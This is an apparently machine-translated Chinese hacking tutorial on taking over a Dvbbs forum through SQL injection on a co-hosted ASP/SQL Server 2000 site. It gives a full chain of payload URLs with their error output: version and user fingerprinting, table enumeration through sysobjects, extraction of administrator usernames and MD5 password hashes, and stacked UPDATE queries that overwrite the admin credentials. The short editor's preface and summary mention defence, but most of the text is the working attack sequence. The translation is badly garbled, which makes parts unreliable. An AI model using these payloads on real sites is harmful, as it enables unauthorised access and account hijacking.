Edit preface: I have no testing this article, but the premise is still a lot, such as having some other programs exists, but also use the same SQL Server library, but also assume that the injection vulnerability. It is nothing to do with the bottom and mobile network, but because the openness of the mobile network forum is familiar with its database structure, and procedures. Take administrative privileges in a step attack, then upgrade the permissions, if just the database is the SA account, it is more trouble.
It is because of the assumptions of these conditions, so everyone does not have to be too nervous, and it is provided in many ideal intrusion in many ideal, and the security vulnerability is reduced in programming is to pay attention to each of our programmers. When the webmaster uses multiple programs in combination, they should pay attention to security and program integrity.
There are also 2-3 times of the multi-purpose network 7.0 SP2 I have learned, so everyone should pay attention to the upgrade, and perform permission settings in detail. It's not good to say that the opening of his program is a lot of people, there are a lot of people, and there will be a lot of BUG. The software is said, the more BUG will be. Relatively, I like to customize the developed procedures, which will be safe.
Below is the text of the sixth boy
Now the latest version of the mobile network is 7.0 SP2. It should be said that safety is already very high. So from the script itself to break through it. It is difficult to do. But we can indirect "to" to "moving network from some ways. Now the combination of IIS ASP SQL2000 is more common. And a website uses a lot of ASP script, which is inevitably not leaking. If there is a SQL injection point on a host, this host is equipped with a moving network SQL version, basically can be concluded: this network is yours. Let's take a look at the example.
First, first determine the goal. Suppose the following URLs have SQL injection: http://www.loveyou.com/Type.asp? Id = 6 test can be injected to add a single quotation number after 6.
http://www.loveyou.com/type.aspid=6 'Return Error Tips: Microsoft OLE DB Provider for ODBC Drivers Error' 80040E14 '[Microsoft] [ODBC SQL Server Driver] [SQL Server] String' Unclosed quotes.
Continue, first detect the system version: http://www.loveyou.com/Type.asp? Id = (select @@ version) -
Back: Microsoft Ole DB Provider for ODBC Drivers Error '80040E07' [Microsoft] [ODBC SQL Server Driver] [SQL Server] NVARCHAR VAT 2000 - 8.00.760 (Intel x86) Dec 17 2002 14:22:05 Copyright (C) 1988-2003 Microsoft Corporation Standard Edition ON Windows NT 5.0 (Build 2195: Service Pack 4) The syntax error occurred while converting a column of data type INT. It seems that the latest SP4 patch has been placed.
Get the current connection database user: http://www.loveyou.com/Type.asp? Id = (select user_name ()) -
Returns: Microsoft OLE DB Provider for ODBC Drivers Error '[Microsoft] [ODBC SQL Server Driver] [SQL Server] Convert NVARCHAR Value' WebUser 'When the syntax error occurs when the data type Int is int. Get the current database user from the error message: WebUser gets the current connection database name: http://www.loveyou.com/Type.asp? Id = (Select DB_Name ()) -
Returns: Microsoft OLE DB Provider for ODBC DRIVERS Error '80040E07' [Microsoft] [ODBC SQL Server Driver] [SQL Server] Convert NVARCHAR Value '01City' When the syntax error occurs when the data type Int is intended. Get the current database from the error message: 01city
Next, the permissions are tested: (Note: Because our purpose is to get the network instead of the system. Therefore, the database permissions are not very important to us.) Http://www.loveyou.com/Type.asp?id= (SELECT IS_SRVROLEMEMBER ('sysadmin')) - Returns an error message. Tip The current record has been deleted. It seems that the permissions are not very high. Continue, http://www.loveyou.com/Type.asp? Id = (select% 20is_member ('db_owner')) - Normal display information, it seems that the permissions owned by the connection database are DB_OWNER (Down database owner. But It is more than enough to manipulate data.
2. Get the name of the database. The various tables of the unexpected mobile network exist in the current database 01city. First get the first table: http://www.loveyou.com/Type.asp? Id = (select top 1 name from sysobjects where xtype = 'u' and status> 0 and name not in ('')) - - Returns: [Microsoft] [ODBC SQL Server Driver] [SQL Server] Convert NVARCHAR Value 'Address' When the data type is a column of data type INT, a syntax error occurs. Ok, the first table name is: Address continues, http://www.loveyou.com/Type.asp? Id = (select top 1 name from sysobjects where xtype = 'u' and status> 0 and Name Not in ('address')) - Returns: The second table name of Admin is also coming out. Pushing, submitting: http://www.loveyou.com/Type.asp? Id = (select top 1 name from sysobjects where xtype = 'u' and status> 0 and name not in ('address',' admin " , ...) -
You can get all the table names in the current database. After a while, the result came out, the name is good. "Address", "admin", "bbslink", "bbsnews", "board", "user" ......... The fool looks out this is the table of moving network. Of course there are some other tables, we don't take it. Just do it, don't guess the fields, we will open your own network database and look at it. Since there is a table name, the field name, then, is the mobile phone is not under your master? But don't do Drop Table. It's not good to destroy. Our goal is to exercise technology and improve the level. Ok, then, we went to get the background of the mobile network. Third, enter the background, and obtain the power network forum administrator privileges. Let's take a look at how many administrators in the background: http://www.loveyou.com/Type.asp? Id = 6 and 4 = (username) - Return error: The current record has been deleted . Explain that the administrator is less than 4 digits. Submit directly, http://www.loveyou.com/Type.asp? Id = 6 and 1 = (username) - Normal display information, it seems that the administrator only has one, read the administrator name , Http://www.loveyou.com/Type.asp? ID = (select username from admin) - out, the administrator background login name is: 01CITY Continue to read the administrator background login password: http: // www .loveyou.com / type.asp? id = (Select Password from admin) - Work, password is: E7CC01BE0E33A273 is MD5 encrypted. Do you want to crack it? Don't worry, don't need to break the MD5 password at all. Since the background management is a cookie session authentication. Therefore, only the administrator will be managed in the front desk to enter the background management, and the general user cannot be managed in the back. Even if the background users and passwords know it. So we have to get the user and password managed by the front desk. This is easy, register a user in his forum to check the management team, draw, the front desk management users are: admin
Ok, get his password: http://www.loveyou.com/Type.asp? Id = (select userpassword from user where username = 'admin') - Return, the front desk password for admin: E7CC01BE0E33A273 is also MD5 . Now use the cookie spoof to manage it to manage it. But is there any other way? Don't forget that now we have a blend of blending on its database. Smart, you may think of it, right, is Update. Let's submit: http://www.loveyou.com/Type.asp? Id = 6; Update User set userpassword = '49ba59abbe56e057' where username = 'admin'; - Normal return information, should be successfully executed, check out : Http://www.loveyou.com/Type.asp? Id = (Select UserPassword from user where username = 'admin') - The return value is: 49ba59abbe56e057 Change password success, explain, this 16-bit MD5 is a pre-calculated Ok. You have to know its plain text password. Then, we change the management password in the background. First change the background user as the front desk user, submit: http://www.loveyou.com/Type.asp? Id = 6; Update Admin Set Username = ' Admin 'where username =' 01city '- check: http://www.loveyou.com/Type.asp? id = (select user from admin) - Change success, background administrator has now become: admin Change your password, submit: http://www.loveyou.com/Type.asp? Id = 6; Update Admin SET Password = '49ba59abbe56e057' where username = 'admin' - Check: http://www.loveyou .com / type.asp? id = (select password from admin) - Change success, the background administrator password has become: 49ba59abbe56e057 so far, the mobile network has been completely fallen. You can use the admin to log in the front desk and then use the same password to enter the background.
Fourth, the summary is not too difficult to implement the control of the on-action network. Through this kind of good penetration test, it also exposes terribleity of SQL Injection attack. And the virtual host for IIS ASP SQL2000 is simply anti-fighting. As long as there is a SQL injection point on the host, the mobile network will face the disaster of the top. In fact, it is not difficult to find such a SQL injection point from the large website program of the server. It should be marked with an old saying: a thousand miles of embankment, collapsed in the ant hole. Therefore, the best way to prevent such an attack is to enhance the security of the program code. Safety is a whole, any subtle mistakes may result in serious consequences.
